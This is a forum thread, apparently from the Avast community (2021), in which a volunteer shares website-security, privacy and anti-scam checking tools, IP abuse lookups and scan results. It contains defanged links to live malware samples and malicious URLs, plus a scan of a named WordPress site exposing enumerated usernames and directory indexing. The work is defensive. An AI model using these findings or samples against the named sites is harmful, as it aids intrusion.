Example: https://crxcavator.io/report/ljafjhbjenhgcgnikniijchkngljgjda?platform=Chrome&new_scan=true

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 19, 2021, 05:37:26 PM
Google will limit user agent Chrome info not earlier than next year.

See how unique you and your browser are: https://amiunique.org/fp

"Yes! You are unique among the 3524670 fingerprints in our entire dataset".

Read: https://whoer.net/blog/fingerprints-unique-browser-traces-part-2/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 23, 2021, 10:57:00 PM
Dear online Interweb's end-users,

Your privacy may be at stake. Nice resources: https://restoreprivacy.com/

On search engines, where your privacy is often the price you pay for your search results.

Some search engines may have big red flags, when owned by a US company.

The U.S. has extensive surveillance pograms, which are caried out by various branches of the government
with a long history of facilitating bulk data collection (questions raised for private search engines hosted on Amazon,
and also in the Cloud). So read here: https://restoreprivacy.com/private-search-engine/ 

(info credits: Sven Taylor 2020).

With the new situation at hand now through 2021 and the pandemic,
we'll have to see how privacy restore can still be enabled, and to what an extent.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 26, 2021, 10:05:24 PM
Check on changing status when opening a particular website inside the browser and security of a connection.
-https://ip-46.com/77.247.110.24
200
200
  from cache
and
-https://ip-46.com/77.247.110.24
-1
-1
 
 14111 ms
0
Backlinks
LRT Power0
PAGE
LRT Trust0
0
 
0

No PFS - https://sitereport.netcraft.com/?url=https://ip-46.com

Communicating file detected: https://www.virustotal.com/gui/ip-address/198.50.154.167/relations

F-test scores: https://observatory.mozilla.org/analyze/ip-46.com

Free check sites at: (example) https://www.ssltrust.com.au/ssl-tools/website-security-check?domain=forum.avast.com (all green).

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 29, 2021, 12:46:18 PM
Checking the vulnerability and security status of an open source project's code?

Check here: https://metrics.openssf.org/grafana/d/default/metric-dashboard?orgId=1&var-PackageURL=pkg:github%2Fretirejs%2Fretire.js   (random example for retire.js)

Can best be done by others than those that wrote the code,
as developers are known to be blind to their own coding-errors.

Main issue can be is the code being maintained (no left code): https://isitmaintained.com/project/retirejs/retire.js

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 31, 2021, 12:55:54 PM
Indicators of Compromise, read: https://www.fortinet.com/resources/cyberglossary/indicators-of-compromise
Example of njRAT malware: -https://any.run/malware-trends/njrat
Particular incident: -https://app.any.run/tasks/1bb9bb5f-fba5-4674-80dd-07d7788a771b/
Could not be scanned here: https://urlscan.io/result/fc46bfb6-4b11-4b7a-800c-b795c9d3b94a/
However see: https://urlscan.io/result/79d5e9fe-4635-4e4d-8592-790e479a8ee4/
IoC: https://urlscan.io/result/79d5e9fe-4635-4e4d-8592-790e479a8ee4/#indicators
Server error encountered for: https://urlscan.io/domain/knrpc.olark.com

Another resource:
-https://bazaar.abuse.ch/sample/0685a699fb13d6bc99b6aee35381acf77b00155d56e7448a300aa308fd07598c/

Earlier abuse was not detected on IP here: 3.141.210.37  Amazonaws abuse: https://www.shodan.io/host/3.141.210.37
See: https://security-tracker.debian.org/tracker/CVE-2018-20685  for 7.4.p1 Debian Open SSH vuln.
User Enumeration is not being treated as a vulnerability, and provision recovery requests.

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on June 01, 2021, 11:10:42 PM
Recently blocked in the latest version of Firefox.
Test for it here: https://webkay.robinlinus.com/
Disable this https://robinlinus.github.io/autofill-phishing/

Or test here:
https://www.hellotech.com/blog/what-your-web-browser-knows-about-you
See what I did? https://i.gyazo.com/172e2bba116d697698b81313116d49b3.png

pol
Title: Re: Tests and other Media topics
Post by: polonus on June 05, 2021, 06:19:09 PM
Interesting security project for code developers by Google.
Example
Re: https://deps.dev./npm/node.js  (see why for instance owner 0.0.0. was deleted).
Re: https://deps.dev/npm/bootstrap

Also view information about checks (for instance through fuzzing) and how to fix failures.

Vizualization: https://deps.dev/cargo/tui  Example: https://deps.dev/cargo/bootstrap/1.0.2

polonus (volunteer 3rd party cold reconnaissance website security-analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on June 05, 2021, 10:00:41 PM
Other likewise projects: https://owasp.org/www-project-dependency-check/

Snyk, NSP & Retire.JS: https://developers.redhat.com/blog/2017/04/12/using-snyk-nsp-and-retire-js-to-identify-and-fix-vulnerable-dependencies-in-your-node-js-applications

Re: https://support.snyk.io/hc/en-us/articles/360010452717-Snyk-Vs-NPM-Audit -> https://snyk.io/vuln *
plenty of tools like: https://github.com/East5th/check-checker

A random SNYK online website scanner report, of a website with no known vulnerabilities as overall scan result:
https://webpagetest.org/result/210605_AiDc3S_d7752fa2dead94d56a2e264d24d0b4de/
Info credits go to Catchpoint Systems Inc. Dulles VA.
In JSON same report: https://webpagetest.org/jsonResult.php?test=210605_AiDc3S_d7752fa2dead94d56a2e264d24d0b4de&pretty=1

pol
Title: Re: Tests and other Media topics
Post by: polonus on June 06, 2021, 03:01:36 PM
Detect a roque DCHP server with Microsoft Roque Check Tool.
MS does not have the downlink link anymore.
But it can still be found here: https://www.tachytelic.net/2019/05/detect-rogue-dhcp-server/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 09, 2021, 07:01:48 PM
Check your browser fingerprint: https://fingerprints.bablosoft.com/canvas

Mine slightly adjusted by Jitter extension.

pol
Title: Re: Tests and other Media topics
Post by: polonus on June 17, 2021, 12:11:18 AM
Some cache clearing/cache evading code could be interpreted as attack code when used in uri's.

What code:
Quote
ajax%28%7B+url%3A+window.location.href%2C+headers%3A+%7B+"Pragma"+%3A+"no-cache"+%2C+"Expires"+%3A+-1%2C+"Cache-Control"+%3A+"no-cache"+%7D+%7D%29.done%28function+%28%29+%7B+window.location.reload%28true%29

This triggers a attack code alarm detected by NoScript and a proposition to block the requst,
or allowed could bring you back to a welcome page on php driven websites, when used as part of an uri request.

The code is from stackoverflow (info credits go there), so proposedly given with good intentions to solve a problem,
but can deliver a ban when used inside an uri. So be aware with your cut and pasting inside your browser of choice.
Always (re-)think before you leap,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 20, 2021, 10:16:12 PM
Keep an eye on the availability of the big (cloud) networks.
Re: https://www.dnsperf.com/  And mind you, when you see less, it's better.
See random example: https://www.dnsperf.com/dns-provider/onapp

What would we see in case of a big cyber-infrastructure meltdown?
In case of trouble here: https://www.dnsperf.com/dns-provider/cloudflare (or amazon)?
Also see: https://dnsmap.io/#A/restoreprivacy.com

WEF's spokesmen have warned us it could come to this.

Security never should be a last resort issue. ;)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 14, 2021, 05:54:09 PM
Block ads, want to add some blocklists to your adblocker of choice:
https://firebog.net/

Tool to keep all in sync: https://github.com/jacklul/pihole-updatelists

DNS Analytics: https://blog.cloudflare.com/dns-analytics/

Enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 19, 2021, 01:03:54 AM
Test your magenta CMS site through MageReport dot com. Here we will see outdated CMS being flagged.

Re: https://urlscan.io/result/4bcc9cbb-8242-4929-bc0c-5e7becd532b6/
and https://www.magereport.com/scan/?s=http://martfurynew.mydevportals.com/

Do not venture out there as the connection is not secure.

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on July 22, 2021, 11:47:04 AM
Pegasus Spyware: Amnesty International has come out with a tool, to check your smartphone for this spyware:

https://github.com/mvt-project/mvt

Link to a list of IOC's to use (Indicators of Compromise) here: https://www.security.nl/posting/712743#posting713140

It needs some niftiness handling a command line, but it is a way for people to establish whether they have been targeted.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 26, 2021, 02:47:02 PM
Check for fraudulent IP: https://scamalytics.com/ip

Also: https://www.abuseipdb.com/

IP v4 v6 Intelligence: https://ip-46.com/

Don't forget about Avast Online Security in your browser, also report there.

Also: https://phishcheck.me/6224/details (random example) ; https://www.scam-detector.com/article/list-of-scamming-websites/ ;
https://www.azsecure-data.org/phishing-websites.html  &  https://www.consumerfraudreporting.org/current_top_10_scam_list.php

Re: https://www.virustotal.com/gui/domain/mercetruck.com.br/detection (latest detection by Phisbank, 4 vendors detect).
Unprotected Magento website: https://www.magereport.com/scan/?s=http://www.mercetruck.com.br/
Insecure connection to -http://162.144.139.197/cgi-sys/defaultwebpage.cgi

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 28, 2021, 06:57:40 PM
Checking URLhaus links with Link Extractor and at VT.
https://urlhaus.abuse.ch/browse.php?search=https%3A%2F%2Fdocs.zohopublic.com%2F  (Trickbot, rob114, rob111, -dll malware)
Example -https://urlextractor.net/?target_url=https%3A%2F%2Fdocs.zohopublic.com%2F&href=1&link_type=all&image=1&meta=1&extract=Extract+Links
with 9 links (minus - when you want to venture to visit urlextractor yourself).

1 to detect: https://www.virustotal.com/gui/url/336cc2ea335242788e4c4a0c814c043b81001e82216b7cce9263045169b3ee2f/detection

For that link at URLhaus behind a London proxy I get:
Quote
Banned

Guru Mediation:
Details: cache-ams21032-AMS 16274908XX YYY5846374

Site issue: https://sitecheck.sucuri.net/results/https/accounts.zoho.com/signin?q=servicename%3DZohoPC%26serviceurl%3D%252Findex.do   - 204.141.42.100 abuse

Detected android files (10), see for IP: https://www.virustotal.com/gui/ip-address/204.141.42.97/relations

polonus (volunteer 3rd party website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on July 29, 2021, 10:27:30 PM
Checking with extensions in Chrome for security issues on websites.

In general: Avast Online Security - Bitdefender's Traffic Light - Dr Web Link Checker (also out as an online service).
Netcraft Extension, Recx Security Analyzer, retire.js (no longer available as an online service), Quick Source Viewer, , VT4 browser extension, Zenmate Web Firewall (no longer available), just recently new: punkspider-browser-extension (also coming soon as an online service), Shodan, Tracker SSL.

Punkspider checks for SQLI, TRAV, XPATH and XSS vulnerabilities.

Also use this scan: (random example)
https://snyk.io/test/website-scanner/?test=210729_BiDcDR_4cd520c32268413a93d0db4d09dc1f4a

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 02, 2021, 05:54:35 PM
Criminals used punycode domain to imitate Brave.com.
The real criminal issue is that such DNS registrations are for sale.

Test in your browser, whether you get an alert: https://www.xn--80ak6aa92e.com/
Google Chrome will alert you, and you can choose to mind that warning (the best option) or ignore.

Here a punycode converter: https://www.punycoder.com/

When using firefox browser
In Firefox:
1. Open about:config
2. Set the value "network.IDN_show_punycode" to "true"
Fixed.


pol
Title: Re: Tests and other Media topics
Post by: polonus on August 05, 2021, 10:10:40 PM
Website links galore: https://urlextractor.net/?target_url=

Enjoy, my friends, enjoy,

pol
Title: Re: Tests and other Media topics
Post by: polonus on August 06, 2021, 03:57:27 PM
Be ahead of scams. Check for scam websites.
scamanalyze.com
scamvoid.net
scamdoc.com
scamdetector.com
scamquery.com
ripandscam.com
scambusters.org/scamcheck.html
scamvoid.net

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 08, 2021, 05:02:47 PM
Comparing info on a Tor exit node IP and abuse on a VPN/TOR Proxy.

9 distinct reporters reported here: https://ip-46.com/45.153.160.140
GreyNoise has it and flags it: https://www.greynoise.io/viz/ip/45.153.160.140
Also found in this database: https://www.abuseipdb.com/check/45.153.160.140
Unsafe connection -http://45.153.160.140/  &  https://www.ip-lookup.org/location/45.153.160.140
9 security vendors to flag IP: https://www.virustotal.com/gui/url/74a30a455eeaac138a4985a36cc2eff76959decff61994b62ad10cbabb212643/detection
See outgoing links: https://www.virustotal.com/gui/url/74a30a455eeaac138a4985a36cc2eff76959decff61994b62ad10cbabb212643/links

Interesting info on the Peter Kleissner's intelligence search engine (indexable by every bot for that matter)
https://intelx.io/?s=http%3A%2F%2Fvoices.washingtonpost.com%2Fsecurityfix%2F2008%2F08%2Fweb_fraud_20_tools.html
further example: https://intelx.io/?did=29f4761d-26e6-4f36-a21a-bc526a38933f  -> selectors.
Also interesting: https://notgoogle.com/demo/?search=apache

polonus (volunteer 3rd party cold reconnaisance website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on August 22, 2021, 08:43:55 PM
Check whether a domain is spoofable for instance through ~all item
https://www.smartfense.com/en-us/tools/spoofcheck/
Alsof test at https://dnstwister.report

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 24, 2021, 08:29:07 PM
Check regular expressions here https://www.regextester.com/93652
Another test site: https://regex101.com/r/rV7zK8/1
This for the technical IT staff and pen-testers, error-hunters etc.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 05, 2021, 03:19:42 PM
Browser security test: https://browseraudit.com/test?categories=
Only one critical in the Brave browser om android.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 17, 2021, 03:26:45 PM
I gave you all here various examples of quick and dirty CMS security scans.
Read: https://hackertarget.com/100k-top-wordpress-powered-sites/
For Magenta use: https://www.magereport.com/  from Dutch developer GWillem and his tool Hypernode.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 17, 2021, 06:01:27 PM
A scamsite scanner: https://www.scamdoc.com/fr/view/628399
and for the english version: https://www.scamdoc.com/view/628399

Another scam checker: www.scam-detector.com * & www.urlvoid.com  and www.scamquery.com
and  scamanalyze.com

*
Quote
403 ERROR
The request could not be satisfied.
Request blocked. We can't connect to the server for this app or website at this time. There might be too much traffic or a configuration error. Try again later, or contact the app or website owner.
If you provide content to customers through CloudFront, you can find steps to troubleshoot and help prevent this error by reviewing the CloudFront documentation.
Generated by cloudfront (CloudFront)
Request ID: AXrfJDWsRhfiwYJsDrXX-XXXXXXXvv4YncRR5pRQcGpV_PTet1icSg== (XXX by me for obvious reasons, pol).


polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 18, 2021, 05:20:00 PM
I report webforum spammers here: (random example) https://ip-46.com/146.196.34.252
Also mentioned here: https://www.projecthoneypot.org/ip_146.196.34.37

polonus
Title: Re: Tests and other Media topics
Post by: DavidR on September 18, 2021, 05:42:21 PM
I report webforum spammers here: (random example) https://ip-46.com/146.196.34.252
Also mentioned here: https://www.projecthoneypot.org/ip_146.196.34.37

polonus

Nothing unusual there, Indian IP that SFS also indicates reported spammers, most of  the spammers hitting the forum are also Indian IP addresses, but you can't block them all.
Title: Re: Tests and other Media topics
Post by: polonus on September 18, 2021, 06:51:40 PM
Hi DavidR,

Before making them disappear with account and including all topics and postings, I note the IP and report it.

Agree with you that a Delhi IP address may be hosting a variety of such mainly webforum Coinbase phone number spammers, that seem also involved in all sorts of other attack and abuse activities.
For many a continuous pain in the neck. Sending them to digital oblivion seems the sensible thing to do.

And it is not only the spammer but also those that offer them a hiding-place to start their evil trade from.
Not doing anything just seems the other extreme for me.

But I agree you are right in your conclusions, as you most often are,

Kind regards,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 15, 2021, 11:58:00 AM
Online Proxifier Profile Creator by hilebol: https://hilebol.space/proxifier-profile-creator/

Test:
https://hidemy.name/tr/proxy-checker/  &  https://checkerproxy.net/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 17, 2021, 11:04:39 PM
Checking URLHause browse links at VT.
Example: https://urlhaus.abuse.ch/url/1688922/

Checked: 6 engines flagged 4 hrs ago: https://www.virustotal.com/gui/url/f68fd30a505fece0f4efae6fc5c717347b6db677757071a972fac3266e778587/detection

Results for the CloudFlare IP on VT: https://www.virustotal.com/gui/ip-address/104.21.77.66/relations

Website being blacklisted: https://sitecheck.sucuri.net/results/a.gogamea.com/userhome/2202/any.exe

Redirect scan at VT, flagged by 5: https://www.virustotal.com/gui/url/bba9a9547d48a12c809efbb1d45ff8c4ec791f16e507146891be9d14345bc580

Webroot classifies site as malware site.  Abuse going on on a cloudflare server.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 22, 2021, 01:33:32 PM
DNSViz: https://dnsviz.net/d/www.splunk.com/dnssec/

EDNS Compliance Tester: https://ednscomp.isc.org/ednscomp/16a499e8f2

Enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 22, 2021, 06:50:44 PM
Or start a website project here: https://sitechecker.pro/app/main/dashboard  (free demo)

pol
Title: Re: Tests and other Media topics
Post by: polonus on October 24, 2021, 12:38:17 AM
Check on and report spammers:

https://ip-46.com/212.102.33.248#ip-feeds
https://cleantalk.org/blacklists/212.102.33.248
https://www.abuseipdb.com/whois/212.102.33.248
https://scamalytics.com/ip/212.102.33.248
https://www.zerospam.org/ip-blacklist/212.102.33.248/

Whenever spammers are met, report them, so they could end up inside blocklists,
so they can be where they should reside, and that is digital oblivion.

polonus

P.S. polonus as member of ASO (Anti-Spam-Offensive)
Title: Re: Tests and other Media topics
Post by: polonus on October 30, 2021, 11:50:09 AM
Why certain cookies, as mentioned with example, should be blocked.

Data is processed in countries without a suitable level of data protection.
When you do not allow webpushr it is being blocked by uMatrix and Cookienator.

Check and read: https://cookiedatabase.org/service/webpushr/

Other resources with another example:
https://cookie-scanner.com/summary/stripe.com?ucrid=CRICC8eb6d94e4e9b1dccf2054eda08bd4ff2

For third party AnalyticsSyncHistory cookies:
https://cookie-scanner.com/summary/www.avaloncx.com?ucrid=CRICCd9143443b9686958de3de4c56d5425f2
Indexable by every bot. Self-referencing canonical

pol
Title: Re: Tests and other Media topics
Post by: polonus on November 08, 2021, 01:03:18 PM
Test canvas fingerprinting aspects inside your browser:
https://canvasblocker.kkapsner.de/test/

Tested with CyDec Security Anti-FP extension.

Firefox Focus browser has fingerprinting per default aboard.

pol
Title: Re: Tests and other Media topics
Post by: polonus on November 10, 2021, 03:18:11 PM
Avast Secure Browser follows the Chrome 95.0 specifications here: https://privacytests.org/

Also see the tenta.com/test & browser privacy test gives an overall score of 45/100. (webbrowsertools.com)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 18, 2021, 10:39:51 PM
How to work webhint inside the browser's development console?
Install the extension and then open Ctrl+Shift+I now. After that click hint at the top far right in the developer's console.

Hint will go over the page opened and inform you with tips (hints/issues).

Example for: htxps://ai-techpark.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp
CSS features with 2 warnings: 'outline-offset' is not supported by Internet Explorer.
'content-type' header charset value should be 'utf-8'.

'content-type' header media type value should be 'text/javascript', not 'application/x-javascript'.

HTML: Resource should use cache busting but URL does not match configured patterns.

JS: JavaScript content should be minified. Security header issues.

But there is more with the general site as scanned for by hackertarget wp scan:

Scanned  https://hackertarget.com/wordpress-security-scan/  we will get 6 issues.

Outdated kernel software - outdated Word Press version, outdated plug-ins.

Not being disabled: User Enumeration
The first two user ID's were tested to determine if user enumeration is possible.

Username   Name
ID: 1   techpark   
ID: 2   businesswire   
It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring. As this will reduce the chance of automated password attackers gaining access. Take note that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation.

And also here: Directory Indexing
In the test an attempt was made to list the directory contents of the uploads and plugins folders to determine if Directory Indexing is enabled. This is a common information leakage vulnerability that can reveal sensitive information regarding your site configuration or content.

Path Tested   Status
/wp-content/uploads/      enabled
/wp-content/plugins/      disabled
Directory indexing is tested on the /wp-content/uploads/ and /wp-content/plugins/ directores. Note that other directories may have this web server feature enabled, so ensure you check other folders in your installation. It is good practice to ensure directory indexing is disabled for your full WordPress installation either through the web server configuration or .htaccess.

Linked sites and js resources all checked. But you can lint them using webhint one by one.

Retire.js (also a browser extension) finds:
jquery   1.12.4   Found in -https://ai-techpark.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp _____Vulnerability info:
Medium   2432 3rd party CORS request may execute CVE-2015-9251   1234
Medium   CVE-2015-9251 11974 parseHTML() executes scripts in event handlers   123
Medium   CVE-2019-11358 jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution   123
Medium   CVE-2020-11022 Regex in its jQuery.htmlPrefilter sometimes may introduce XSS   1
Medium   CVE-2020-11023 Regex in its jQuery.htmlPrefilter sometimes may introduce XSS   1
jquery-migrate   1.4.1   Found in -https://ai-techpark.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1

Enjoy my good friends, enjoy - developer console a real trove of security information opens up gradually  ;)

pol


Title: Re: Tests and other Media topics
Post by: DavidR on November 19, 2021, 12:29:45 AM
How to work webhint inside the browser's development console?
Install the extension and then open Ctrl+Shift+I now. After that click hint at the top far right in the developer's console.
<snip>
pol

Its a shame that the old URL scanner link doesn't work any more, -https://webhint.io/scanner/ I get a 404 error on that link now.

Not sure I would want to install a browser add-on to carry out these checks (if that is what it is doing).
Title: Re: Tests and other Media topics
Post by: polonus on November 19, 2021, 06:22:31 AM
@ DavidR,

Happens all the time. Webhint is not the only online scanner, that has disappeared over time. Some don't even reappear as an extension for use inside the developer's console. Google won't allow online dom-xss scanners, but allows instances like questionable Punkspider.

So webhint has now been reduced to a community of approx. 4.000 developers.
Glad I could make it back to work for the website analysis I do here.

But the going gets more and more narrow all the time.
Just another script taken off of tampermonkey, because Googl insists on -180.upload.com, -4upfiles.com and -get.adobe.com
no longer being blocked by that particular script, and it seems "they call the shots globally".

Alas, it is like it is,

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on November 19, 2021, 05:09:08 PM
Another disadvantage of using extensions in the developer console is that it is not suited for webpage scanning,
as a website could be potentially malicious. Then an online third party scan could be the only secure option left
or using a special browser like Bobby's Malzilla for instance with a specific VM.

Malware should be studied on a stand alone offline device, one not being connected to the Internet.

So there are a couple of online scanners left.
For instance, this one: https://www.web-malware-removal.com/website-malware-virus-scanner/

Checked a site and is OK, but has some server related issue:
Quote
Server Details:

apache

Google and Web-Browser Content different! (an issue known as so-called "cloaking" (pol).
Google: 64539 bytes       Firefox: 64743 bytes,    Diff:   204 bytes

l" class="rss_link">rss</a> <a href="-https://twitter.com/securitynl" target="_blank" class="twitter_link">twitter</a> </div> </div> </div> </div> </body> </html> ...

Suspicious links found
-https://www.certifiedsecure.com --> ''
-https://www.certifiedsecure.com/live?q=secnl20211116 --> ' '

HTML Source: View -> -https://www.websicherheit.at/_d/hilite.php?url=https://www.security.nl

Console information received:
Quote
Failed to load resource: net::ERR_FILE_NOT_FOUND
hilite.php:1 Access to fetch at '-https://s-install.avcdn.net/aos/assets/prod/translations/Locale-en-US.json' from origin 'https://www.websicherheit.at' has been blocked by CORS policy: No 'Access-Control-Allow-Origin' header is present on the requested resource. If an opaque response serves your needs, set the request's mode to 'no-cors' to fetch the resource with CORS disabled.
s-install.avcdn.net/aos/assets/prod/translations/Locale-en-US.json:1 Failed to load resource: net::ERR_FAILED
userscript.html?name=AdRemover.user.js&id=2e3eadc0-39e9-4512-bab0-1e350c99d118:236 Starting AdRemover 8.5 on https://www.websicherheit.at/_d/hilite.php?url=https://www.security.nl ...
userscript.html?name=AdRemover.user.js&id=2e3eadc0-39e9-4512-bab0-1e350c99d118:760 AdRemover 8.5 has finished it's work! [89 ms]
VM42:69 Syntax error @ "Malware Script Detector v 1.1 Enhanced"!
##########################
JSHINT output:
##########################

SyntaxError: Unexpected identifier
    at eval (<anonymous>)
    at <anonymous>:4:80
    at Object.t [as F_c] (<anonymous>:3:191)
    at Object.E_u (<anonymous>:4:244)
    at eval (eval at exec_fn (:2:115), <anonymous>:67:477)
    at Object.create (eval at exec_fn (:2:115), <anonymous>:69:193)
    at c (eval at exec_fn (:2:115), <anonymous>:7:231)
    at <anonymous>:4:80
    at i (eval at exec_fn (:2:115), <anonymous>:5:165)
    at eval (eval at exec_fn (:2:115), <anonymous>:5:292)
eval @ VM42:69
VM42:69 Syntax error @ "Alert DOM-XSS Userscript"!
##########################
JSHINT output:
##########################

SyntaxError: Invalid regular expression flags
    at eval (<anonymous>)
    at <anonymous>:4:80
    at Object.t [as F_c] (<anonymous>:3:191)
    at Object.E_u (<anonymous>:4:244)
    at eval (eval at exec_fn (:2:115), <anonymous>:67:477)
    at Object.create (eval at exec_fn (:2:115), <anonymous>:69:193)
    at c (eval at exec_fn (:2:115), <anonymous>:7:231)
    at <anonymous>:4:80
    at i (eval at exec_fn (:2:115), <anonymous>:5:165)
    at eval (eval at exec_fn (:2:115), <anonymous>:5:292)
eval @ VM42:69
VM42:69 Uncaught SyntaxError: Unexpected identifier
    at eval (<anonymous>)
    at <anonymous>:4:80
    at Object.t [as F_c] (<anonymous>:3:191)
    at Object.E_u (<anonymous>:4:244)
    at eval (eval at exec_fn (hilite.php:2), <anonymous>:67:477)
    at Object.create (eval at exec_fn (hilite.php:2), <anonymous>:69:193)
    at c (eval at exec_fn (hilite.php:2), <anonymous>:7:231)
    at <anonymous>:4:80
    at i (eval at exec_fn (hilite.php:2), <anonymous>:5:165)
    at eval (eval at exec_fn (hilite.php:2), <anonymous>:5:292)
VM42:69 Uncaught SyntaxError: Invalid regular expression flags
    at eval (<anonymous>)
    at <anonymous>:4:80
    at Object.t [as F_c] (<anonymous>:3:191)
    at Object.E_u (<anonymous>:4:244)
    at eval (eval at exec_fn (hilite.php:2), <anonymous>:67:477)
    at Object.create (eval at exec_fn (hilite.php:2), <anonymous>:69:193)
    at c (eval at exec_fn (hilite.php:2), <anonymous>:7:231)
    at <anonymous>:4:80
    at i (eval at exec_fn (hilite.php:2), <anonymous>:5:165)
    at eval (eval at exec_fn (hilite.php:2), <anonymous>:5:292)
userscript.html?name=AdRemover.user.js&id=2e3eadc0-39e9-4512-bab0-1e350c99d118:260 Starting AdRemover 8.5 on
-https://www.websicherheit.at/_d/hilite.php?url=htxps://www.security.nl 4 seconds after page load ...
102VM94 watch-expression-1.devtools:1 Timer 'default' already exists
(anonymous) @ VM94 watch-expression-1.devtools:1

We could also audit using Lighthouse and node.js.
Final results:

Webpage Score
Malware A Spam A Phishing A
External Status
Blacklisting A Google Spam A
Server C
 
polonus
Title: Re: Tests and other Media topics
Post by: DavidR on November 19, 2021, 07:42:45 PM
Another disadvantage of using extensions in the developer console is that it is not suited for webpage scanning,
as a website could be potentially malicious. Then an online third party scan could be the only secure option left
or using a special browser like Bobby's Malzilla for instance with a specific VM.

Malware should be studied on a stand alone offline device, one not being connected to the Internet.

So there are a couple of online scanners left.
For instance, this one: https://www.web-malware-removal.com/website-malware-virus-scanner/

Checked a site and is OK, but has some server related issue:
Quote
Server Details:

apache

Google and Web-Browser Content different! (an issue known as so-called "cloaking" (pol).
Google: 64539 bytes       Firefox: 64743 bytes,    Diff:   204 bytes

l" class="rss_link">rss</a> <a href="-https://twitter.com/securitynl" target="_blank" class="twitter_link">twitter</a> </div> </div> </div> </div> </body> </html> ...

Suspicious links found
-https://www.certifiedsecure.com --> ''
-https://www.certifiedsecure.com/live?q=secnl20211116 --> ' '

HTML Source: View -> -https://www.websicherheit.at/_d/hilite.php?url=https://www.security.nl
<snip>
polonus


Thanks for the link, I will check it out soon no doubt.
Title: Re: Tests and other Media topics
Post by: polonus on November 19, 2021, 10:42:03 PM
But before you start, study a particular subject - like for instance the ins and outs of DOM-XSS sinks and sources.
Also read from stackoverflow and other resources. A researcher/error-hunter should read-inform-read-inform
to get familiar with all the aspects of what he or she is doing.

Whenever you are into a form of particular specific scanning,
be ready to make yourself familiar with resources, for instance by using spreadsheets.

For DOM-XSS sinks and sources like these examples:
https://docs.google.com/spreadsheets/d/1Mnuqkbs9L-s3QpQtUrOkPx6t5dR3QyQo24kCVYQy7YY/edit#gid=0

Above particular spreadsheet is meant to work on a specific native jQuery version.

pol
Title: Re: Tests and other Media topics
Post by: polonus on November 19, 2021, 11:14:46 PM
Next to a website address (URL or uri) one should also always check the corresponding IP (could be several) for that particular website.

IP could be on a banlist, check: https://www.dnsqueries.com/en/check_banned_ip.php
Also check here: http://www.brightcloud.com/tools/url-ip-lookup.php
or here: https://www.threatcrowd.org/ip.php?ip=216.58.208.33 (random example)
or here: https://hetrixtools.com/  or  http://webyzer.net/ip/181.224.138.136 (random example)
or here: https://www.abuseipdb.com/check/46.126.113.90 (random example)
or here: https://www.ip-tracker.org/lookup.php?ip=102.66.223.235 (random example)

Also at VT we could find a lot of information just giving in and query for a particular IP.
And where I also regularly report: https://ip-46.com/  IP v4 v6 Intelligence, (fine resources  ;) ),

Good hunt,

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on November 23, 2021, 10:40:25 PM
Before visiting a Magento wenshop website, it is a good idea to scan it at magereport.com.

Maybe some webshops might have been splendidly deveoped at first, but weren't updated in time:
random example: https://www.magereport.com/scan/?s=https://hoegl.com/  (outdated Magento version)

There are always threats around the corner: https://www.ncsc.gov.uk/news/guidance-for-retailers-to-prevent-websites-becoming-black-friday-cyber-traps

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 05, 2021, 12:06:37 PM
We all may have used these well-known free online website malware scanners at some moment in time:
Re: https://geekflare.com/online-scan-website-security-vulnerabilities

This is a not so well-known website privacy scanner: https://themarkup.org/blacklight?url=

For those on tor looking for "bad relays": https://metrics.torproject.org/  also: https://intelx.io/ (blocked to be used inside tor)

Enjoy, my good friends, enjoy,

pol
Title: Re: Tests and other Media topics
Post by: polonus on December 07, 2021, 01:19:36 PM
To eventually detect traces of a Pegasus snoopware compromittal,
now MVT (Mobile Verification Toolkit) has been developed for android.
Re: http://github.com/mvt-project/mvt

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 11, 2021, 01:19:20 PM
Check your Word Press plug-ins for vulnerability and latest updates.

55,9% of Word Press CMS websites are being hacked through vulnerable plugins.

Hackers can run all sorts of malicious activities like stealing data, run unwanted ads, defacing websites etc.
Furthermore this may redirect visitors, leads to injected spam and content, installed malcreations (malware),
creation of roque admin accounts, all wreaking havoc on website revenues and your online reputation.

Also various bad may happen with bad configuration seen after install, that means
'user enumeration' not set as disabled, and also 'directory listing' not set as disabled.

